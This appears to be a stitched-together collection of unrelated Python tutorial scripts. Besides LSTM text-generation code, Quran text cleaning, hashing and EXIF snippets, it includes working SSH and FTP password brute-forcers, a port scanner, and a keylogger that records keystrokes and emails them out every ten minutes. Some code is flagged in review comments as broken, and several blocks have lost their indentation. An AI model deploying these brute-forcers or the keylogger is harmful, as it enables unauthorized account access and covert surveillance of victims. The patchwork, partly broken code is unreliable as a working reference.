    :param n_steps: kept for interface compatibility (used in chars_per_batch)
    :yields: X of shape (batch_size, sequence_length, n_unique_chars) and
             y of shape (batch_size, n_unique_chars)
    """
    chars_per_batch = batch_size * n_steps
    n_batches = len(sentences) // chars_per_batch
    while True:
        for start in range(0, len(sentences), batch_size):
            X = np.zeros((batch_size, sequence_length, n_unique_chars))
            y = np.zeros((batch_size, n_unique_chars))
            # BUG FIX: the inner enumerate used to shadow the outer index `i`,
            # so labels were read from y_train[0:batch_size] for EVERY batch.
            # Offset by `start` so each sentence gets its own label.
            for j, sentence in enumerate(sentences[start: start + batch_size]):
                for t, char in enumerate(sentence):
                    X[j, t, char2int[char]] = 1
                y[j, char2int[y_train[start + j]]] = 1
            yield X, y
# Clean the Quran text: keep only Arabic letters, '.' and spaces.
from pyarabic.araby import ALPHABETIC_ORDER
with open("quran.txt", encoding="utf8") as f:
    text = f.read()
unique_chars = set(text)
print("unique chars:", unique_chars)
# every character pyarabic considers part of the Arabic alphabet
arabic_alpha = { c for c, order in ALPHABETIC_ORDER.items() }
# characters present in the text but NOT Arabic letters
to_be_removed = unique_chars - arabic_alpha
# NOTE(review): the '' member below looks like a non-ASCII character (e.g. a
# verse marker) lost in transit -- confirm against the original script.
to_be_removed = to_be_removed - {'.', ' ', ''}
print(to_be_removed)
# NOTE(review): replace("", ".") inserts '.' between every pair of characters;
# the first argument was presumably a verse-end symbol. Verify before running.
text = text.replace("", ".")
for char in to_be_removed:
    text = text.replace(char, "")
# normalise whitespace around newlines
text = text.replace(" ", " ")
text = text.replace(" \n", "")
text = text.replace("\n ", "")
with open("quran_cleaned.txt", "w", encoding="utf8") as f:
    print(text, file=f)
from sklearn.model_selection import GridSearchCV
from keras.wrappers.scikit_learn import KerasClassifier
from utils import read_data, text_to_sequence, get_batches, get_data
from models import rnn_model
from keras.layers import LSTM
import numpy as np
text, int2char, char2int = read_data()
batch_size = 256
test_size = 0.2
n_steps = 200
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
X, Y = get_data(X_train, batch_size, n_steps, vocab_size=vocab_size+1)
print(X.shape)
print(Y.shape)
# cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True
model = KerasClassifier(build_fn=rnn_model, input_dim=n_steps, cell=LSTM, num_layers=2, dropout=0.2, output_dim=vocab_size+1,
batch_normalization=True, bidirectional=True)
params = {
"units": [100, 128, 200, 256, 300]
}
grid = GridSearchCV(estimator=model, param_grid=params)
grid_result = grid.fit(X, Y)
print(grid_result.best_estimator_)
print(grid_result.best_params_)
print(grid_result.best_score_)
from keras.models import Sequential
from keras.layers import LSTM, Dropout, BatchNormalization, LeakyReLU, Dense, Activation, TimeDistributed, Bidirectional
def rnn_model(input_dim, cell, num_layers, units, dropout, output_dim, batch_normalization=True, bidirectional=True):
    """Build and compile a stacked recurrent softmax classifier.

    Stacks `num_layers` recurrent layers of type `cell` (e.g. LSTM), each
    followed by optional BatchNormalization, Dropout and LeakyReLU, ending in
    a Dense softmax of `output_dim` units. Compiled with categorical
    cross-entropy and the Nadam optimizer.

    NOTE(review): `bidirectional` is never applied to the FIRST layer (the
    wrapped version is commented out below), and when num_layers == 1 the
    single layer keeps return_sequences=True before Dense -- confirm both are
    intended.
    """
    model = Sequential()
    for i in range(num_layers):
        if i == 0:
            # first time, specify input_shape
            # if bidirectional:
            #     model.add(Bidirectional(cell(units, input_shape=(None, input_dim), return_sequences=True)))
            # else:
            model.add(cell(units, input_shape=(None, input_dim), return_sequences=True))
            if batch_normalization:
                model.add(BatchNormalization())
            model.add(Dropout(dropout))
            model.add(LeakyReLU(alpha=0.1))
        else:
            # only the last layer collapses the sequence to a single vector
            if i == num_layers - 1:
                return_sequences = False
            else:
                return_sequences = True
            if bidirectional:
                model.add(Bidirectional(cell(units, return_sequences=return_sequences)))
            else:
                model.add(cell(units, return_sequences=return_sequences))
            if batch_normalization:
                model.add(BatchNormalization())
            model.add(Dropout(dropout))
            model.add(LeakyReLU(alpha=0.1))
    model.add(Dense(output_dim, activation="softmax"))
    model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
    return model
# Force TensorFlow onto the CPU by hiding all CUDA devices.
import os
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID" # see issue #152
os.environ["CUDA_VISIBLE_DEVICES"] = "-1"
import tensorflow as tf
# NOTE(review): this ConfigProto is built but never passed to a tf.Session in
# this snippet -- the CUDA_VISIBLE_DEVICES line above is what actually forces
# CPU execution. Confirm the config is consumed elsewhere.
config = tf.ConfigProto(intra_op_parallelism_threads=5,
                        inter_op_parallelism_threads=5,
                        allow_soft_placement=True,
                        device_count = {'CPU' : 1,
                                        'GPU' : 0}
                        )
from models import rnn_model
from keras.layers import LSTM
from utils import sequence_to_text, get_data
import numpy as np
import pickle
char2int = pickle.load(open("results/char2int.pickle", "rb"))
int2char = { v:k for k, v in char2int.items() }
print(int2char)
n_steps = 500
def text_to_sequence(text):
    """Encode *text* as a list of integer tokens via the module-level char2int."""
    global char2int
    sequence = []
    for character in text:
        sequence.append(char2int[character])
    return sequence
def pick_top_n(preds, vocab_size, top_n=5):
    """Sample one class index from the `top_n` most likely predictions.

    All but the top_n probabilities are zeroed (in place, on the squeezed
    view) and the remainder renormalised before sampling.
    """
    probs = np.squeeze(preds)
    # indices of everything EXCEPT the top_n highest probabilities
    cutoff = np.argsort(probs)[:-top_n]
    probs[cutoff] = 0
    # renormalise so the surviving mass sums to one
    probs = probs / np.sum(probs)
    return np.random.choice(vocab_size, 1, p=probs)[0]
def logits_to_text(logits):
    """
    Return the single most likely character for one vector of logits.

    Note: despite the plural name, this maps ONE logit vector to ONE
    character (argmax over axis 0 via the module-level int2char map),
    not a whole sequence to a string -- see the commented alternative.
    :param logits: 1-D array of per-character scores from the network
    :return: the character (str) with the highest score
    """
    return int2char[np.argmax(logits, axis=0)]
    # return ''.join([int2char[prediction] for prediction in np.argmax(logits, 1)])
def generate_code(model, initial_text, n_chars=100):
    """Generate `n_chars` new characters from `model`, seeded by `initial_text`.

    Each predicted character is appended to the growing seed so every new
    prediction is conditioned on everything generated so far. Relies on the
    module-level `n_steps`, `text_to_sequence`, `get_data` and `logits_to_text`.
    """
    new_chars = ""
    for i in range(n_chars):
        # encode the current seed and reshape it into the model's input layout
        x = np.array(text_to_sequence(initial_text))
        x, _ = get_data(x, 64, n_steps, 1)
        pred = model.predict(x)[0][0]
        c = logits_to_text(pred)
        new_chars += c
        initial_text += c
    return new_chars
model = rnn_model(input_dim=n_steps, output_dim=99, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
model.load_weights("results/rnn_3.5")
x = """x = np.array(text_to_sequence(x))
x, _ = get_data(x, n_steps, 1)
print(x.shape)
print(x.shape)
print(model.predict_proba(x))
print(model.predict_classes(x))
def pick_top_n(preds, vocab_size, top_n=5):
p = np.squeeze(preds)
p[np.argsort(p)[:-top_n]] = 0
p = p / np.sum(p)
c = np.random.choice(vocab_size, 1, p=p)[0]
return c
def sample(checkpoint, n_samples, lstm_size, vocab_size, prime="The"):
samples = [c for c in prime]
with train_chars.tf.Session() as sess:
saver.restore(sess, checkpoint)
new_state = sess.run(model.initial_state)
for c in prime:
x = np.zeros((1, 1))
x[0,0] = train_chars.char2int[c]
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
# print("Preds:", preds)
c = pick_top_n(preds, len(train_chars.vocab))
samples.append(train_chars.int2char[c])
for i in range(n_samples):
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(char)
# if i == n_samples - 1 and char != " " and char != ".":
if i == n_samples - 1 and char != " ":
# while char != "." and char != " ":
while char != " ":
x[0,0] = c
feed = {model.inputs: x,
model.keep_prob: 1.,
model.initial_state: new_state}
preds, new_state = sess.run([model.prediction, model.final_state],
feed_dict=feed)
c = pick_top_n(preds, len(train_chars.vocab))
char = train_chars.int2char[c]
samples.append(cha
"""
# print(x.shape)
# print(x.shape)
# pred = model.predict(x)[0][0]
# print(pred)
# print(logits_to_text(pred))
# print(model.predict_classes(x))
print(generate_code(model, x, n_chars=500))
from models import rnn_model
from keras.layers import LSTM
from keras.callbacks import ModelCheckpoint
from utils import text_to_sequence, sequence_to_text, get_batches, read_data, get_data, get_data_length
import numpy as np
import os
text, int2char, char2int = read_data(load=False)
batch_size = 256
test_size = 0.2
n_steps = 500
n_chars = len(text)
vocab_size = len(set(text))
print("n_steps:", n_steps)
print("n_chars:", n_chars)
print("vocab_size:", vocab_size)
encoded = np.array(text_to_sequence(text))
n_train = int(n_chars * (1-test_size))
X_train = encoded[:n_train]
X_test = encoded[n_train:]
train = get_batches(X_train, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
test = get_batches(X_test, batch_size, n_steps, output_format="many", vocab_size=vocab_size+1)
for i, t in enumerate(train):
if i == 2:
break
print(t[0])
print(np.array(t[0]).shape)
# print(test.shape)
# # DIM = 28
# model = rnn_model(input_dim=n_steps, output_dim=vocab_size+1, cell=LSTM, num_layers=3, units=200, dropout=0.2, batch_normalization=True)
# model.summary()
# model.compile(loss="categorical_crossentropy", optimizer="nadam", metrics=["accuracy"])
# if not os.path.isdir("results"):
# os.mkdir("results")
# checkpointer = ModelCheckpoint("results/rnn_{val_loss:.1f}", save_best_only=True, verbose=1)
# train_steps_per_epoch = get_data_length(X_train, n_steps, output_format="one") // batch_size
# test_steps_per_epoch = get_data_length(X_test, n_steps, output_format="one") // batch_size
# print("train_steps_per_epoch:", train_steps_per_epoch)
# print("test_steps_per_epoch:", test_steps_per_epoch)
# model.load_weights("results/rnn_3.2")
# model.fit_generator(train,
# epochs=30,
# validation_data=(test),
# steps_per_epoch=train_steps_per_epoch,
# validation_steps=test_steps_per_epoch,
# callbacks=[checkpointer],
# verbose=1)
# model.save("results/rnn_final.model")
import numpy as np
import tqdm
import pickle
from keras.utils import to_categorical
int2char, char2int = None, None
def read_data(load=False):
    """Read the training corpus and build (or reload) the char<->int maps.

    :param load: if True, reload int2char/char2int from the pickles under
                 results/; if False, rebuild them from the text and save them.
    :return: (text, int2char, char2int)

    NOTE(review): the corpus path is hard-coded to a Windows location, and
    token ids start at 1 (0 is implicitly left free, e.g. for padding).
    """
    global int2char
    global char2int
    with open("E:\\datasets\\text\\my_python_code.py") as f:
        text = f.read()
    unique_chars = set(text)
    if not load:
        # fresh vocabulary: enumerate from 1 and persist both directions
        int2char = { i: c for i, c in enumerate(unique_chars, start=1) }
        char2int = { c: i for i, c in enumerate(unique_chars, start=1) }
        pickle.dump(int2char, open("results/int2char.pickle", "wb"))
        pickle.dump(char2int, open("results/char2int.pickle", "wb"))
    else:
        int2char = pickle.load(open("results/int2char.pickle", "rb"))
        char2int = pickle.load(open("results/char2int.pickle", "rb"))
    return text, int2char, char2int
def get_batches(arr, batch_size, n_steps, vocab_size, output_format="many"):
    '''Create a generator that returns batches of size
    batch_size x n_steps from arr.
    Arguments
    ---------
    arr: Array you want to make batches from
    batch_size: Batch size, the number of sequences per batch
    n_steps: Number of sequence steps per batch
    vocab_size: one-hot depth used for the "one" output format
    output_format: "many" yields (x, y) where y is x shifted by one step
                   (sequence-to-sequence); "one" yields one one-hot target
                   character per window (sequence-to-one)
    '''
    # trim arr so it divides evenly into batch_size rows
    chars_per_batch = batch_size * n_steps
    n_batches = len(arr) // chars_per_batch
    arr = arr[:chars_per_batch * n_batches]
    arr = arr.reshape((batch_size, -1))
    if output_format == "many":
        while True:
            for n in range(0, arr.shape[1], n_steps):
                x = arr[:, n: n+n_steps]
                # targets are the inputs shifted one step left; the final
                # window's missing last column is zero-padded
                y_temp = arr[:, n+1:n+n_steps+1]
                y = np.zeros(x.shape, dtype=y_temp.dtype)
                y[:, :y_temp.shape[1]] = y_temp
                # prepend a leading batch axis of size 1 for fit_generator
                yield x.reshape(1, x.shape[0], x.shape[1]), y.reshape(1, y.shape[0], y.shape[1])
    elif output_format == "one":
        while True:
            # X = np.zeros((arr.shape[1], n_steps))
            # y = np.zeros((arr.shape[1], 1))
            # for i in range(n_samples-n_steps):
            #     X[i] = np.array([ p.replace(",", "") if isinstance(p, str) else p for p in df.Price.iloc[i: i+n_steps] ])
            #     price = df.Price.iloc[i + n_steps]
            #     y[i] = price.replace(",", "") if isinstance(price, str) else price
            for n in range(arr.shape[1] - n_steps-1):
                x = arr[:, n: n+n_steps]
                # target is the character right after the window
                y = arr[:, n+n_steps+1]
                # print("y.shape:", y.shape)
                y = to_categorical(y, num_classes=vocab_size)
                # print("y.shape after categorical:", y.shape)
                y = np.expand_dims(y, axis=0)
                yield x.reshape(1, x.shape[0], x.shape[1]), y
def get_data(arr, batch_size, n_steps, vocab_size):
    """Materialise the whole encoded corpus as one (X, Y) pair (non-generator).

    NOTE(review): `Y[n] = y` assigns a (batch_size, vocab_size) array into a
    single row of Y, which only broadcasts when batch_size == vocab_size, and
    successive windows overwrite overlapping columns of X -- this function
    looks unfinished; verify before relying on it.
    """
    # n_samples = len(arr) // n_seq
    # X = np.zeros((n_seq, n_samples))
    # Y = np.zeros((n_seq, n_samples))
    # trim arr so it divides evenly into batch_size rows
    chars_per_batch = batch_size * n_steps
    n_batches = len(arr) // chars_per_batch
    arr = arr[:chars_per_batch * n_batches]
    arr = arr.reshape((batch_size, -1))
    # for index, i in enumerate(range(0, n_samples*n_seq, n_seq)):
    #     x = arr[i:i+n_seq]
    #     y = arr[i+1:i+n_seq+1]
    #     if len(x) != n_seq or len(y) != n_seq:
    #         break
    #     X[:, index] = x
    #     Y[:, index] = y
    X = np.zeros((batch_size, arr.shape[1]))
    Y = np.zeros((batch_size, vocab_size))
    for n in range(arr.shape[1] - n_steps-1):
        x = arr[:, n: n+n_steps]
        # target is the character right after the window
        y = arr[:, n+n_steps+1]
        # print("y.shape:", y.shape)
        y = to_categorical(y, num_classes=vocab_size)
        # print("y.shape after categorical:", y.shape)
        # y = np.expand_dims(y, axis=1)
        X[:, n: n+n_steps] = x
        Y[n] = y
        # yield x.reshape(1, x.shape[0], x.shape[1]), y
    return np.expand_dims(X, axis=1), Y
    # return n_samples
    # return X.T.reshape(1, X.shape[1], X.shape[0]), Y.T.reshape(1, Y.shape[1], Y.shape[0])
def get_data_length(arr, n_seq, output_format="many"):
    """Number of samples *arr* yields for the given output format.

    "many": count of full non-overlapping sequences; "one": sliding-window
    count. Any other format returns None, matching the original fall-through.
    """
    counters = {
        "many": lambda: len(arr) // n_seq,
        "one": lambda: len(arr) - n_seq,
    }
    counter = counters.get(output_format)
    return counter() if counter is not None else None
def text_to_sequence(text):
    """Translate each character of *text* into its integer id (global char2int)."""
    global char2int
    return list(map(char2int.__getitem__, text))
def sequence_to_text(sequence):
    """Decode a sequence of integer ids back into a string (global int2char)."""
    global int2char
    chars = []
    for token in sequence:
        chars.append(int2char[token])
    return ''.join(chars)
# Concatenate all 114 surahs from per-surah JSON files into one text file,
# with every ayah terminated by '.' so verses can be split later.
import json
import os
import glob
CUR_DIR = os.getcwd()
text = ""
# for filename in os.listdir(os.path.join(CUR_DIR, "data", "json")):
surat = [ f"surah_{i}.json" for i in range(1, 115) ]
for filename in surat:
    filename = os.path.join(CUR_DIR, "data", "json", filename)
    file = json.load(open(filename, encoding="utf8"))
    content = file['verse']
    for verse_id, ayah in content.items():
        text += f"{ayah}."
# quick corpus statistics
n_ayah = len(text.split("."))
n_words = len(text.split(" "))
n_chars = len(text)
print(f"Number of ayat: {n_ayah}, Number of words: {n_words}, Number of chars: {n_chars}")
with open("quran.txt", "w", encoding="utf8") as quran_file:
    print(text, file=quran_file)
import paramiko
import socket
import time
from colorama import init, Fore
# initialize colorama
init()
GREEN = Fore.GREEN
RED = Fore.RED
RESET = Fore.RESET
BLUE = Fore.BLUE
def is_ssh_open(hostname, username, password):
    """Attempt one SSH login; return True if the credentials work.

    Returns False on timeout or authentication failure. On a generic
    SSHException (e.g. server throttling) it sleeps 60s and retries the
    SAME credentials recursively.
    """
    # initialize SSH client
    client = paramiko.SSHClient()
    # add to know hosts
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    try:
        client.connect(hostname=hostname, username=username, password=password, timeout=3)
    except socket.timeout:
        # this is when host is unreachable
        print(f"{RED}[!] Host: {hostname} is unreachable, timed out.{RESET}")
        return False
    except paramiko.AuthenticationException:
        print(f"[!] Invalid credentials for {username}:{password}")
        return False
    except paramiko.SSHException:
        print(f"{BLUE}[*] Quota exceeded, retrying with delay...{RESET}")
        # sleep for a minute
        time.sleep(60)
        return is_ssh_open(hostname, username, password)
    else:
        # connection was established successfully
        print(f"{GREEN}[+] Found combo:\n\tHOSTNAME: {hostname}\n\tUSERNAME: {username}\n\tPASSWORD: {password}{RESET}")
        return True
if __name__ == "__main__":
    import argparse
    parser = argparse.ArgumentParser(description="SSH Bruteforce Python script.")
    parser.add_argument("host", help="Hostname or IP Address of SSH Server to bruteforce.")
    parser.add_argument("-P", "--passlist", help="File that contain password list in each line.")
    parser.add_argument("-u", "--user", help="Host username.")
    # parse passed arguments
    args = parser.parse_args()
    host = args.host
    passlist = args.passlist
    user = args.user
    # read the wordlist (one candidate per line); use a context manager so
    # the handle is closed instead of leaked as before
    with open(passlist) as wordlist_file:
        passlist = wordlist_file.read().splitlines()
    # brute-force: stop at the first password that authenticates
    for password in passlist:
        if is_ssh_open(host, user, password):
            # if combo is valid, save it as 'user@host:password'; the
            # original omitted the '@' separator and leaked the handle
            with open("credentials.txt", "w") as cred_file:
                cred_file.write(f"{user}@{host}:{password}")
            break
from cryptography.fernet import Fernet
import os
def write_key():
    """
    Generates a key and save it into a file
    """
    with open("key.key", "wb") as key_file:
        key_file.write(Fernet.generate_key())
def load_key():
    """Load and return the saved key from ./key.key.

    Returns:
        bytes: the raw key previously written by write_key().
    """
    # use a context manager so the handle is closed deterministically
    # (the original left the file object to be closed by the GC)
    with open("key.key", "rb") as key_file:
        return key_file.read()
def encrypt(filename, key):
    """
    Given a filename (str) and key (bytes), it encrypts the file and write it
    back to the same path, replacing the plaintext in place.
    """
    f = Fernet(key)
    with open(filename, "rb") as file:
        # read all file data
        file_data = file.read()
    # encrypt data
    encrypted_data = f.encrypt(file_data)
    # write the encrypted file
    with open(filename, "wb") as file:
        file.write(encrypted_data)
def decrypt(filename, key):
    """
    Given a filename (str) and key (bytes), it decrypts the file and write it
    back to the same path, restoring the original plaintext in place.
    Raises cryptography's InvalidToken if the key does not match.
    """
    f = Fernet(key)
    with open(filename, "rb") as file:
        # read the encrypted data
        encrypted_data = file.read()
    # decrypt data
    decrypted_data = f.decrypt(encrypted_data)
    # write the original file
    with open(filename, "wb") as file:
        file.write(decrypted_data)
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="Simple File Encryptor Script")
parser.add_argument("file", help="File to encrypt/decrypt")
parser.add_argument("-g", "--generate-key", dest="generate_key", action="store_true",
help="Whether to generate a new key or use existing")
parser.add_argument("-e", "--encrypt", action="store_true",
help="Whether to encrypt the file, only -e or -d can be specified.")
parser.add_argument("-d", "--decrypt", action="store_true",
help="Whether to decrypt the file, only -e or -d can be specified.")
args = parser.parse_args()
file = args.file
generate_key = args.generate_key
if generate_key:
write_key()
# load the key
key = load_key()
encrypt_ = args.encrypt
decrypt_ = args.decrypt
if encrypt_ and decrypt_:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
elif encrypt_:
encrypt(file, key)
elif decrypt_:
decrypt(file, key)
else:
raise TypeError("Please specify whether you want to encrypt the file or decrypt it.")
import ftplib
from threading import Thread
import queue
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
# init()
# initialize the queue
q = queue.Queue()
# port of FTP, aka 21
port = 21
def connect_ftp():
    """Worker loop: pull passwords off the shared queue and try each via FTP.

    Uses the module-level `q`, `host`, `user` and `port`. On success the
    queue is emptied so other workers stop picking up new passwords.
    """
    global q
    while True:
        # get the password from the queue
        password = q.get()
        # initialize the FTP server object
        server = ftplib.FTP()
        print("[!] Trying", password)
        try:
            # tries to connect to FTP server with a timeout of 5
            server.connect(host, port, timeout=5)
            # login using the credentials (user & password)
            server.login(user, password)
        except ftplib.error_perm:
            # login failed, wrong credentials
            pass
        else:
            # correct credentials
            print(f"{Fore.GREEN}[+] Found credentials: ")
            print(f"\tHost: {host}")
            print(f"\tUser: {user}")
            print(f"\tPassword: {password}{Fore.RESET}")
            # we found the password, let's clear the queue
            # NOTE(review): this pokes Queue internals (mutex, all_tasks_done,
            # unfinished_tasks), which is unsupported API; the task_done() in
            # finally may then raise "task_done() called too many times".
            with q.mutex:
                q.queue.clear()
                q.all_tasks_done.notify_all()
                q.unfinished_tasks = 0
        finally:
            # notify the queue that the task is completed for this password
            q.task_done()
if __name__ == "__main__":
import argparse
parser = argparse.ArgumentParser(description="FTP Cracker made with Python")
parser.add_argument("host", help="The target host or IP address of the FTP server")
parser.add_argument("-u", "--user", help="The username of target FTP server")
parser.add_argument("-p", "--passlist", help="The path of the pass list")
parser.add_argument("-t", "--threads", help="Number of workers to spawn for logining, default is 30", default=30)
args = parser.parse_args()
# hostname or IP address of the FTP server
host = args.host
# username of the FTP server, root as default for linux
user = args.user
passlist = args.passlist
# number of threads to spawn
n_threads = args.threads
# read the wordlist of passwords
passwords = open(passlist).read().split("\n")
print("[+] Passwords to try:", len(passwords))
# put all passwords to the queue
for password in passwords:
q.put(password)
# create n_threads that runs that function
for t in range(n_threads):
thread = Thread(target=connect_ftp)
# will end when the main thread end
thread.daemon = True
thread.start()
# wait for the queue to be empty
q.join()
import ftplib
from colorama import Fore, init # for fancy colors, nothing else
# init the console for colors (for Windows)
init()
# hostname or IP address of the FTP server
host = "192.168.1.113"
# username of the FTP server, root as default for linux
user = "test"
# port of FTP, aka 21
port = 21
def is_correct(password):
    """Return True if `password` logs into the module-level FTP host/user.

    Only ftplib.error_perm (bad credentials) is treated as failure; network
    errors such as timeouts propagate to the caller.
    """
    # initialize the FTP server object
    server = ftplib.FTP()
    print(f"[!] Trying", password)
    try:
        # tries to connect to FTP server with a timeout of 5
        server.connect(host, port, timeout=5)
        # login using the credentials (user & password)
        server.login(user, password)
    except ftplib.error_perm:
        # login failed, wrong credentials
        return False
    else:
        # correct credentials
        print(f"{Fore.GREEN}[+] Found credentials:", password, Fore.RESET)
        return True
# read the wordlist of passwords
passwords = open("wordlist.txt").read().split("\n")
print("[+] Passwords to try:", len(passwords))
# iterate over passwords one by one
# if the password is found, break out of the loop
for password in passwords:
if is_correct(password):
break
import hashlib
import sys
def read_file(file):
    """Read an entire file in 16 KB chunks and return its raw bytes."""
    CHUNK_SIZE = 16384  # 16 kilo bytes
    chunks = []
    with open(file, "rb") as f:
        while True:
            data = f.read(CHUNK_SIZE)
            if not data:
                # end of file reached
                break
            chunks.append(data)
    # join once at the end instead of concatenating bytes in the loop
    return b"".join(chunks)
if __name__ == "__main__":
# read some file
file_content = read_file(sys.argv[1])
# some chksums:
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(file_content).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(file_content).hexdigest())
print("SHA-512:", hashlib.sha512(file_content).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(file_content).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(file_content).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(file_content).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(file_content).hexdigest())
import hashlib
# encode it to bytes using UTF-8 encoding
message = "Some text to hash".encode()
# hash with MD5 (not recommended)
print("MD5:", hashlib.md5(message).hexdigest())
# hash with SHA-2 (SHA-256 & SHA-512)
print("SHA-256:", hashlib.sha256(message).hexdigest())
print("SHA-512:", hashlib.sha512(message).hexdigest())
# hash with SHA-3
print("SHA-3-256:", hashlib.sha3_256(message).hexdigest())
print("SHA-3-512:", hashlib.sha3_512(message).hexdigest())
# hash with BLAKE2
# 256-bit BLAKE2 (or BLAKE2s)
print("BLAKE2c:", hashlib.blake2s(message).hexdigest())
# 512-bit BLAKE2 (or BLAKE2b)
print("BLAKE2b:", hashlib.blake2b(message).hexdigest())
from PIL import Image
from PIL.ExifTags import TAGS
import sys
# path to the image or video
imagename = sys.argv[1]
# read the image data using PIL
image = Image.open(imagename)
# extract EXIF data
exifdata = image.getexif()
# iterating over all EXIF data fields
for tag_id in exifdata:
# get the tag name, instead of human unreadable tag id
tag = TAGS.get(tag_id, tag_id)
data = exifdata.get(tag_id)
# decode bytes
if isinstance(data, bytes):
data = data.decode()
print(f"{tag:25}: {data}")
import keyboard # for keylogs
import smtplib # for sending email using SMTP protocol (gmail)
# Semaphore is for blocking the current thread
# Timer is to make a method runs after an interval amount of time
from threading import Semaphore, Timer
SEND_REPORT_EVERY = 600 # 10 minutes
EMAIL_ADDRESS = "put_real_address_heregmail.com"
EMAIL_PASSWORD = "put_real_pw"
class Keylogger:
    """Record keystrokes via the `keyboard` library and email the collected
    log every `interval` seconds through Gmail SMTP."""
    def __init__(self, interval):
        # we gonna pass SEND_REPORT_EVERY to interval
        self.interval = interval
        # this is the string variable that contains the log of all
        # the keystrokes within self.interval
        self.log = ""
        # for blocking after setting the on_release listener
        self.semaphore = Semaphore(0)
    def callback(self, event):
        """
        This callback is invoked whenever a keyboard event is occured
        (i.e when a key is released in this example)
        """
        name = event.name
        if len(name) > 1:
            # not a character, special key (e.g ctrl, alt, etc.)
            # uppercase with []
            if name == "space":
                # " " instead of "space"
                name = " "
            elif name == "enter":
                # add a new line whenever an ENTER is pressed
                name = "[ENTER]\n"
            elif name == "decimal":
                # numpad decimal point
                name = "."
            else:
                # replace spaces with underscores
                name = name.replace(" ", "_")
                name = f"[{name.upper()}]"
        self.log += name
    def sendmail(self, email, password, message):
        """Send `message` from `email` to itself via Gmail SMTP over TLS."""
        # manages a connection to an SMTP server
        server = smtplib.SMTP(host="smtp.gmail.com", port=587)
        # connect to the SMTP server as TLS mode ( for security )
        server.starttls()
        # login to the email account
        server.login(email, password)
        # send the actual message
        server.sendmail(email, email, message)
        # terminates the session
        server.quit()
    def report(self):
        """
        This function gets called every self.interval
        It basically sends keylogs and resets self.log variable
        """
        if self.log:
            # if there is something in log, report it
            self.sendmail(EMAIL_ADDRESS, EMAIL_PASSWORD, self.log)
            # can print to a file, whatever you want
            # print(self.log)
            self.log = ""
        # Timer runs self.report once after self.interval seconds on a
        # fresh thread, so reporting repeats indefinitely
        Timer(interval=self.interval, function=self.report).start()
    def start(self):
        # start the keylogger
        keyboard.on_release(callback=self.callback)
        # start reporting the keylogs
        self.report()
        # block the current thread,
        # since on_release() doesn't block the current thread
        # if we don't block it, when we execute the program, nothing will happen
        # that is because on_release() will start the listener in a separate thread
        self.semaphore.acquire()
if __name__ == "__main__":
keylogger = Keylogger(interval=SEND_REPORT_EVERY)
keylogger.start()
import argparse
import socket # for connecting
from colorama import init, Fore
from threading import Thread, Lock
from queue import Queue
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
# number of threads, feel free to tune this parameter as you wish
N_THREADS = 200
# thread queue
q = Queue()
print_lock = Lock()
def port_scan(port):
    """
    Scan a port on the global variable host

    Prints an "open"/"closed" line, serialised with print_lock so threads
    do not interleave output.
    NOTE(review): if socket.socket() itself raised, `s` would be unbound in
    the finally block; the bare except also hides that distinction. Verify.
    """
    try:
        s = socket.socket()
        s.connect((host, port))
    except:
        with print_lock:
            print(f"{GRAY}{host:15}:{port:5} is closed {RESET}", end='\r')
    else:
        with print_lock:
            print(f"{GREEN}{host:15}:{port:5} is open {RESET}")
    finally:
        s.close()
def scan_thread():
    """Worker loop: take port numbers off the shared queue and scan each one."""
    global q
    while True:
        port = q.get()
        port_scan(port)
        # mark this queue item as processed so q.join() can eventually return
        q.task_done()
def main(host, ports):
    """Spawn N_THREADS daemon scanner threads, enqueue every port, and wait.

    NOTE: `host` is read by the workers as a module-level global; the
    parameter here shadows it only inside this function.
    """
    global q
    for t in range(N_THREADS):
        # for each thread, start it (the loop index is reused as the Thread)
        t = Thread(target=scan_thread)
        # when we set daemon to true, that thread will end when the main thread ends
        t.daemon = True
        # start the daemon thread
        t.start()
    for worker in ports:
        # for each port, put that port into the queue
        # to start scanning
        q.put(worker)
    # wait the threads ( port scanners ) to finish
    q.join()
if __name__ == "__main__":
    # parse some parameters passed
    parser = argparse.ArgumentParser(description="Simple port scanner")
    parser.add_argument("host", help="Host to scan.")
    parser.add_argument("--ports", "-p", dest="port_range", default="1-65535", help="Port range to scan, default is 1-65535 (all ports)")
    args = parser.parse_args()
    host, port_range = args.host, args.port_range
    start_port, end_port = port_range.split("-")
    start_port, end_port = int(start_port), int(end_port)
    # make the range inclusive of end_port: range() excludes its stop value,
    # so the advertised default 1-65535 previously never scanned port 65535
    ports = [ p for p in range(start_port, end_port + 1)]
    main(host, ports)
import socket # for connecting
from colorama import init, Fore
# some colors
init()
GREEN = Fore.GREEN
RESET = Fore.RESET
GRAY = Fore.LIGHTBLACK_EX
def is_port_open(host, port):
    """
    determine whether host has the port open

    Returns True if a TCP connection succeeds within 0.2s, False otherwise
    (any failure -- refused, timeout, DNS error -- counts as closed).
    """
